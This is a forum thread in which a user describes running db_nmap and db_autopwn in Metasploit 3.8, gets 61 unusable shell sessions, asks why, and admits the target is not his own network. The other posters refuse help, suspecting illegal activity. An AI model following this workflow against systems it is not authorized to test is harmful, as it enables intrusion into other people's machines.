Metasploit issue : Sessions but can't interract with.
Hello,
I will try to explain everything with all the details. So to begin with, I opened metasploit (3.8, from BT5) then I typed :
1.db_workspace -d default to remove previous hosts and have a clean database.
2. db_nmap myhost. To check opened ports. There was a lot of opened ports
3. then db_autopwn -p -e -q. It tryied to launch more than 1000 exploit on the target.
At the end of the module exploitation, I got 61 sessions opened on different ports.
Code:
msf > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 shell osx 192.168.1.65:52489 -> 0.0.0.0:5329
2 shell php 192.168.1.65:52639 -> 0.0.0.0:29030
3 shell unix 192.168.1.65:44852 -> 0.0.0.0:31850
4 shell osx 192.168.1.65:45004 -> 0.0.0.0:19512
5 shell bsd 192.168.1.65:37379 -> 0.0.0.0:34134
6 shell unix 192.168.1.65:38508 -> 0.0.0.0:16723
7 shell bsd 192.168.1.65:55874 -> 0.0.0.0:35758
8 shell unix 192.168.1.65:38535 -> 0.0.0.0:22863
9 shell php 192.168.1.65:60917 -> 0.0.0.0:6600
10 shell osx 192.168.1.65:58057 -> 0.0.0.0:24306
11 shell unix 192.168.1.65:51223 -> 0.0.0.0:23035
12 shell php 192.168.1.65:34184 -> 0.0.0.0:30573
13 shell linux 192.168.1.65:43962 -> 0.0.0.0:21530
14 shell unix 192.168.1.65:44205 -> 0.0.0.0:4688
15 shell unix 192.168.1.65:53253 -> 0.0.0.0:26718
16 shell bsd 192.168.1.65:38121 -> 0.0.0.0:21316
17 shell unix 192.168.1.65:59289 -> 0.0.0.0:14446
18 shell unix 192.168.1.65:48479 -> 0.0.0.0:34562
19 shell unix 192.168.1.65:41843 -> 0.0.0.0:12646
20 shell unix 192.168.1.65:36318 -> 0.0.0.0:16865
21 shell unix 192.168.1.65:35443 -> 0.0.0.0:31495
22 shell bsd 192.168.1.65:34100 -> 0.0.0.0:23841
23 shell linux 192.168.1.65:44671 -> 0.0.0.0:7496
24 shell unix 192.168.1.65:42176 -> 0.0.0.0:38070
25 shell solaris 192.168.1.65:36431 -> 0.0.0.0:11273
26 shell solaris 192.168.1.65:34826 -> 0.0.0.0:38624
27 shell unix 192.168.1.65:58813 -> 0.0.0.0:25448
28 shell unix 192.168.1.65:59034 -> 0.0.0.0:14348
29 shell unix 192.168.1.65:60744 -> 0.0.0.0:28887
30 shell unix 192.168.1.65:50868 -> 0.0.0.0:14284
31 shell solaris 192.168.1.65:56390 -> 0.0.0.0:36468
32 shell unix 192.168.1.65:55677 -> 0.0.0.0:16274
33 shell unix 192.168.1.65:50510 -> 0.0.0.0:7735
34 shell linux 192.168.1.65:42841 -> 0.0.0.0:28811
35 shell linux 192.168.1.65:43946 -> 0.0.0.0:37377
36 shell linux 192.168.1.65:54528 -> 0.0.0.0:7446
37 shell linux 192.168.1.65:38293 -> 0.0.0.0:23883
38 shell 192.168.1.65:39716 -> 0.0.0.0:6529
39 shell 192.168.1.65:37119 -> 0.0.0.0:11073
40 shell linux 192.168.1.65:39003 -> 0.0.0.0:6800
41 shell linux 192.168.1.65:45141 -> 0.0.0.0:24449
42 shell unix 192.168.1.65:40953 -> 0.0.0.0:16140
43 shell unix 192.168.1.65:33962 -> 0.0.0.0:37070
44 shell unix 192.168.1.65:40884 -> 0.0.0.0:10438
45 shell php 192.168.1.65:47468 -> 0.0.0.0:12397
46 shell php 192.168.1.65:37743 -> 0.0.0.0:10362
47 shell php 192.168.1.65:43477 -> 0.0.0.0:12830
48 shell unix 192.168.1.65:41447 -> 0.0.0.0:37291
49 shell unix 192.168.1.65:47404 -> 0.0.0.0:14284
50 shell php 192.168.1.65:34512 -> 0.0.0.0:15503
51 shell php 192.168.1.65:57268 -> 0.0.0.0:12121
52 shell unix 192.168.1.65:40069 -> 0.0.0.0:12709
53 shell solaris 192.168.1.65:38218 -> 0.0.0.0:38545
54 shell php 192.168.1.65:55481 -> 0.0.0.0:11744
55 shell php 192.168.1.65:45466 -> 0.0.0.0:20884
56 shell aix 192.168.1.65:48089 -> 0.0.0.0:5217
57 shell unix 192.168.1.65:45310 -> 0.0.0.0:25001
58 shell linux 192.168.1.65:47845 -> 0.0.0.0:20032
59 shell unix 192.168.1.65:55088 -> 0.0.0.0:16546
60 shell unix 192.168.1.65:33744 -> 0.0.0.0:40149
61 shell linux 192.168.1.65:40259 -> 0.0.0.0:19090
msf > sessions -i 54
[*] Starting interaction with 54...
Code:
^C
Abort session 54? [y/N] y
[*] Command shell session 54 closed. Reason: User exit
msf > sessions -i 61[*] Starting interaction with 61...
^C
Abort session 61? [y/N] y
[*] Command shell session 61 closed. Reason: User exit
msf > sessions -i 50[*] Starting interaction with 50...
^C
Abort session 50? [y/N] y
[*] Command shell session 50 closed. Reason: User exit
It seem to block on the interaction.
My first supposition is that the port binded isn't forwarded into my router so I forwarded some of the binded port and the result was the same.
That was just a honeypot or something is just going wrong ?
Any help would be greatly appreciated.
Thank you.
Re: Metasploit issue : Sessions but can't interract with.
Sounds like you're not attacking/testing your own system otherwise you wouldn't ask if that was a honeypot.
Don't expect much (if any) help with illegal activities.
Re: Metasploit issue : Sessions but can't interract with.
To be honest I'm not really interested into gaining shell onto my own computer network.
Of course, it's always fun to test the tools onto the old-school Windows XP without SP1 into your VMWARE, the kind of machine that you will never meet online, but I wanted to test something else, not destroying anything.
Too bad I can't get help in here. Thought, I totally understand the point of view.
Backtrack is designed for security expert and wouldn't serve the script kiddies ( which I'm certainly are, a curious one ).
Peace.
Re: Metasploit issue : Sessions but can't interract with.
msf > sessions
Active sessions
Quote:
===============
Id Type Information Connection
-- ---- ----------- ----------
1 shell osx 192.168.1.65:52489 -> 0.0.0.0:5329
2 shell php 192.168.1.65:52639 -> 0.0.0.0:29030
I believe 0.0.0.0 is a pseudo interface, "any". It's been a while since I used that but I think something's wrong with all those zeros.
Quote:
Sounds like you're not attacking/testing your own system otherwise you wouldn't ask if that was a honeypot.
Don't expect much (if any) help with illegal activities.
+1 to that, but not sure, and anyway, it will be mods' decision !
